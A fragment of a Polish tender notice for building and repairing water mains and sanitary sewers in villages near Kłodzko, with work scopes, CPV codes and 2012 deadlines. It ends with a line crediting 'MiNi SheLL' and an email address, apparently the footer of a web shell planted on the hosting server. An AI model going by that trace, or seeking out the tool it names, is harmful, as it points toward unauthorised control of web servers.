<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.11.12.00-0, 45.23.24.10-9, 45.23.32.20-7, 45.45.30.00-7, 45.23.11.00-6, 45.23.13.00-8, 45.23.31.20-6, 45.00.00.00-7, 45.10.00.00-8, 45.23.24.00-6, 45.23.32.00-1, 45.31.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Budowa wodociągu i kanalizacji sanitarnej w Ołdrzychowicach Kłodzkich.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie obejmuje budowę sieci kanalizacji sanitarnej grawitacyjnej z rur PCV DN200 o długości 993,70 m oraz sieci wodociągowej z rur PE110 o długości 1685,70 m i odgałęzień od sieci PE40 o długości 242,4 m , dla domów jednorodzinnych i zabudowy zagrodowej w Ołdrzychowicach Kłodzkich.
Trasa kanalizacji: poboczem drogi gminnej, pasem drogowym oraz odcinkami po terenie prywatnym.
Studnie kanalizacyjne systemowe przelotowe i połączeniowe z tworzyw sztucznych DN 400 oraz betonowe DN1000 i 1200 mm .
Trasa wodociągu: poboczem drogi gminnej, pasem drogowym (częściowo w jednym wykopie z kanalizacją sanitarną ), terenem zielonym odcinkami po terenie prywatnym.
Zakres robót obejmuje rozebranie i naprawę nawierzchni utwardzonych, rozebranie i naprawę ogrodzeń, obiektów małej architektury, odtworzenie terenów zielonych.
Na trasie kanalizacji przejścia przeciskiem pod ciekami wodnymi.
Na trasie wodociągu przeciski pod ciekami wodnymi.
Poziom wód gruntowych wysoki, możliwy intensywny napływ wody do wykopów.
W trakcie budowy kanalizacji i wodociągu należy zapewnić dostęp do posesji (kładki dla pieszych ), oraz zabezpieczyć teren, na którym prowadzone są roboty.
W trakcie realizacji zadania wystąpią znaczne ograniczenia ruch kołowego. Roboty należy realizować odcinkami, aby zapewnić dojazd do poszczególnych posesji.
Zakres robót:
- roboty ziemne,
- ułożenie kanałów sanitarnych grawitacyjnych O 200 z rur PCV klasy SN8 - 993,7 m 
- wykonanie studzienek kanalizacyjnych z O 400(425) z tworzyw sztucznych - 26 szt. 
- wykonanie studzienek kanalizacyjnych z O 1000/1200 betonowych - 13 szt.
- ułożenie sieci wodociągowych z rur polietylenowych PE110 SDR17, PN10 - 1685,7 m
- ułożenie sieci wodociągowych z rur polietylenowych PE40 SDR17, PN10 - 242,4 m
- umieszczenie rurociągów pod dnem cieków wodnych
- wykonanie przekroczeń przez drogi gminne i powiatową, (pod jezdnią asfaltową przeciski),
- rozbiórka i odbudowa nawierzchni drogowej,
- wykonanie wymaganych prób, badań i sprawdzeń, 
- obsługa geodezyjna, w tym wykonanie wytyczenia obiektów i inwentaryzacji geodezyjnej
   powykonawczej..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.11.12.00-0, 45.23.24.10-9, 45.23.32.20-7, 45.45.30.00-7, 45.23.11.00-6, 45.23.13.00-8, 45.23.31.20-6, 45.00.00.00-7, 45.10.00.00-8, 45.23.24.00-6, 45.31.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Remont wodociągu w Szalejowie Dolnym i Szalejowie Górnym.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie obejmuje remont istniejącej sieci wodociągowej, polegający na wymianie 2503 m awaryjnych (nieszczelnych) odcinków sieci i uzbrojenia (w tym przekroczeń sieci przez cieki wodne i drogi) we wsi Szalejów Dolny i Szalejów Górny.
Zakres robót:
- roboty ziemne,
- wymiana sieci wodociągowej na sieci z rur PE, PEHDo długości łącznie 2503 m 
  o średnicach DN 160, 110, 90, 50 mm, w tym: przejścia przez cieki wodne : 4 szt.
  przejścia pod drogą krajową - 1 szt., pod drogą powiatową - 4 szt., pod drogą gminną - 1 szt.
- wykonanie wymaganych prób, badań, sprawdzeń, 
- obsługa geodezyjna, w tym wykonanie wytyczenia obiektów oraz inwentaryzacji 
   geodezyjna powykonawczej..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.11.12.00-0, 45.23.24.10-9, 45.23.32.20-7, 45.45.30.00-7, 45.23.11.00-6, 45.23.13.00-8, 45.23.31.20-6, 45.00.00.00-7, 45.10.00.00-8, 45.23.24.00-6, 45.23.32.00-1, 45.31.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Remont wodociągu w Żelaźnie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie obejmuje remont istniejącej sieci wodociągowej, polegający na wymianie 1251 m awaryjnych (nieszczelnych) odcinków sieci i uzbrojenia (w tym przekroczeń sieci przez cieki wodne i drogi) oraz 69 m odgałęzień od sieci (związanych z przepięciem istniejących przyłączy do nowej sieci) we wsi Żelazno.
Zakres robót:
- roboty ziemne,
- wodociąg PE DN 110, 90 mm - 1189 m
- wodociąg z rur wzmocnionych PE RC DN 110, 90 mm - 62 m
- wodociąg PE DN 50, 40, 32 mm - 69 m
- rozebranie i odtworzenie nawierzchni utwardzonych, rozebranie i odtworzenie ogrodzeń, obiektów małej architektury, odtworzenie terenów zielonych,
- wykonanie 2 przejść przeciskiem pod droga krajową
- obsługa geodezyjna, w tym wykonanie wytyczenia obiektów oraz inwentaryzacji geodezyjna powykonawczej..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.11.12.00-0, 45.23.24.10-9, 45.23.32.20-7, 45.45.30.00-7, 45.23.11.00-6, 45.23.13.00-8, 45.23.31.20-6, 45.00.00.00-7, 45.10.00.00-8, 45.23.24.00-6, 45.23.32.00-1, 45.31.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Budowa sieci kanalizacji sanitarnej w Żelaźnie - etap III.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie obejmuje budowę sieci kanalizacji sanitarnej wraz z 1 sieciową pompownią ścieków i 1 przydomową pompownią ścieków oraz przykanalikami (tj. odgałęziami od sieci - przekroczeniami przez drogi i ciek wodny) do granicy działki lub pierwszej studni na działce dla istniejących budynków mieszkalnych. 
Odprowadzenie ścieków sanitarnych poprzez włączenie do studzienki w istniejącej sieci gminnej kanalizacji sanitarnej. 
Zakres robót:
- roboty ziemne,
- ułożenie sieci kanałów sanitarnych grawitacyjnych z rur PCV O200 - 858 m 
-  ułożenie kanałów odgałęźnych - 147 m, w tym: grawitacyjnych z rur PCV O160 - 112 m, oraz rurociągu tłocznego z rur PE O110 - 35 m
- montaż studzienek kanalizacyjnych z tworzyw sztucznych O600 - 34 szt.
- montaż studzienek kanalizacyjnych z tworzyw sztucznych O315 - 4 szt.
- wykonanie rurociągu tłocznego z rur PE O110 - 326m 
- dostawa i montaż pompowni ścieków z instalacją zasilającą i automatyką oraz  
  zagospodarowaniem terenu,
- dostawa i montaż 1 przepompowni przydomowej wraz z zasilaniem, 
- naprawa drogi asfaltowej po wykonaniu wykopów,
- umocnienie skarpy rowu.
- wykonanie przekroczeń przez drogi gminne, drogę krajową krajową, (pod jezdnią asfaltową przeciski), oraz teren kolejowy zamknięty PKP.
- rozbiórka i odbudowa nawierzchni drogowej,
- wykonanie wymaganych prób, sprawdzeń, oraz rozruchu,
- obsługa geodezyjna, w tym wykonanie wytyczenia obiektów oraz inwentaryzacji geodezyjna powykonawczej.
Pompownię ścieków należy dostarczyć na plac budowy jako gotowy obiekt z pełnym wyposażeniem wewnętrznym, tj. kompleksowe zestawienie urządzeń ze zbiornikiem, pompami, sterowaniem i wyposażeniem. Zbiornik pompowni winien być wykonany z polimerobetonu lub systemowy z kręgów betonowych B450. Średnica wewnętrzna zbiornika - 1200 mm . Pompownię wyposażyć w dwie pompy zatapialne z wolnym przelotem, praca jednej winna zapewnić 100 % przepływ ścieków. Automatyka sterująca zapewnić musi naprzemienne załączanie się pomp, a w przypadku dużego napływu cieczy obie pompy pracują jednocześnie. Elementy wyposażenia pompowni ze stali nierdzewnej..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.11.12.00-0, 45.23.24.10-9, 45.23.32.20-7, 45.45.30.00-7, 45.23.11.00-6, 45.23.13.00-8, 45.23.31.20-6, 45.00.00.00-7, 45.10.00.00-8, 45.23.24.00-6, 45.23.32.00-1, 45.31.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com